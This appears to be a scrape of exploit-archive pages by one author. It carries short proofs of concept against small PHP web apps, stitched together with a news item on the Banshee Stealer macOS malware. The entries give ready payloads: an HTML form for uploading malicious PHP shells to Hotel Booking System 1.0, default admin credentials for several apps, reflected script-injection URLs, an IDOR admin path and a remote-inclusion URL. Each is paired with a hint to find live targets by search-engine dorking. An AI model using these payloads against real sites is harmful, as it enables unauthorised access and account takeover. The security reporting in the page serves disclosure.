Hotel Booking System version 1.0 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Booking System 1.0 Remote File Upload Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip                                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 9 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Image Upload Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data">  
        <label for="image">Upload an image:</label>  
        <input type="file" id="image" name="image" accept="image/*" required>  
        <button type="submit" name="btn_update">Upload</button>  
    </form>  
</body>  
</html>

[+] part 2 : infected item ( manage_website.php ) .

[+] Line 9 set url of target.

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Update Website Images</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="old_website_image" value="current_website_image.jpg">  
        <label for="website_image">Upload new website image:</label>  
        <input type="file" id="website_image" name="website_image" accept="image/*">

                <input type="hidden" name="old_login_image" value="current_login_image.jpg">  
        <label for="login_image">Upload new login image:</label>  
        <input type="file" id="login_image" name="login_image" accept="image/*">

                <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg">  
        <label for="back_login_image">Upload new back login image:</label>  
        <input type="file" id="back_login_image" name="back_login_image" accept="image/*">

                <button type="submit" name="btn_web">Update Images</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Booking System 1.0 Shell Upload

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Giftora version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Giftora V 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /search?q=1'%22()%26%25<acx><ScRiPt%20>prompt(966079)</ScRiPt>[+] save code as poc.html [+] payload : https://127.0.0.1/giftora.webister.net//search?q=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(966079)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Giftora 1.0 Cross Site Scripting

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference

Cybersecurity researchers have uncovered new stealer malware that's designed to specifically target Apple macOS systems.
Dubbed Banshee Stealer, it's offered for sale in the cybercrime underground for a steep price of $3,000 a month and works across both x86_64 and ARM64 architectures. 
"Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser

Malware / Browser Security

Cybersecurity researchers have uncovered new stealer malware that's designed to specifically target Apple macOS systems.

Dubbed Banshee Stealer, it's offered for sale in the cybercrime underground for a steep price of $3,000 a month and works across both x86\_64 and ARM64 architectures.

"Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat," Elastic Security Labs said in a Thursday report.

The web browsers and crypto wallets targeted by the malware comprise Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic, and Ledger.

It's also equipped to harvest system information and data from iCloud Keychain passwords and Notes, as well as incorporate a slew of anti-analysis and anti-debugging measures to determine if it's running in a virtual environment in an attempt to evade detection.

Furthermore, it makes use of the CFLocaleCopyPreferredLanguages API to avoid infecting systems where Russian is the primary language.

Like other macOS malware strains such as Cuckoo and MacStealer, Banshee Stealer also leverages osascript to display a fake password prompt to trick users into entering their system passwords for privilege escalation.

Among the other notable features include the ability to collect data from various files matching .txt, .docx, .rtf, .doc, .wallet, .keys, and .key extensions from the Desktop and Documents folders. The gathered data is then exfiltrated in a ZIP archive format to a remote server ("45.142.122\[.\]92/send/").

"As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware," Elastic said.

The disclosure comes as Hunt.io and Kandji detailed another macOS stealer strain that leverages SwiftUI and Apple's Open Directory APIs for capturing and verifying passwords entered by the user in a bogus prompt displayed in order to complete the installation process.

"It begins by running a Swift-based dropper that displays a fake password prompt to deceive users," Broadcom-owned Symantec said. "After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server."

This development also follows the continued emergence of new Windows-based stealers such as Flame Stealer, even as fake sites masquerading as OpenAI's text-to-video artificial intelligence (AI) tool, Sora, are being used to propagate Braodo Stealer.

Separately, Israeli users are being targeted with phishing emails containing RAR archive attachments that impersonate Calcalist and Mako to deliver Rhadamanthys Stealer.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Banshee Stealer Targets 100+ Browser Extensions on Apple macOS Systems

Feberr version 13.4 suffers from an ignored default credential vulnerability.

**Feberr 13.4 Insecure Settings**

Posted Aug 15, 2024

Authored by indoushka

Feberr version 13.4 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2e393c441ce609493774dac1c3e5f681c5ce98d1b3702bb114041fdb03335768

Download | Favorite | View

**Feberr 13.4 Insecure Settings**

    ====================================================================================================================================| # Title     : Feberr v13.4 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user&pass: admin[+] https://www/127.0.0.1/nexuscriptscom/admin/pwa-settingsGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Feberr 13.4 Insecure Settings

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

**Farmacia Gama 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Farmacia Gama version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 2caf36ad25ddb5e5fcd4a26fd8ac2e62e0dee3d76fbd95e698130d2b8730632e

Download | Favorite | View

**Farmacia Gama 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 XSS Vulnerability                                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendas[+] http://127.0.0.1/farmacia-master/main.php?notaFiscal=333962'"()%26%25<acx><ScRiPt >prompt(926815)</ScRiPt>&pg=vendasGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Farmacia Gama 1.0 Cross Site Scripting

Ecommerce version 1.15 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce 1.15 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/ecommerce                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpoint.com/ecommerce/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Ecommerce 1.15 Insecure Settings

Covid-19 Contact Tracing System version 1.0 suffers from a cross site scripting vulnerability.

**Covid-19 Contact Tracing System 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Covid-19 Contact Tracing System version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | daa17a59d2ea2f605f71d11b3ba6860a33f90c5ea08d666ce8a3af42e59af5fa

Download | Favorite | View

**Covid-19 Contact Tracing System 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Covid-19 Contact Tracing System 1.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/cts_qr_1.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /cts_qr/admin/?page=system_info'%22()%26%25<acx><ScRiPt%20>prompt(901045)</ScRiPt>[+] http://localhost/cts_qr/admin/?page=system_info%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(901045)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Covid-19 Contact Tracing System 1.0 Cross Site Scripting

Car Rental Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Car Rental Management System 1.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/car-rental-management-system.zip                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : /car_rental/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/car_rental/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#firefox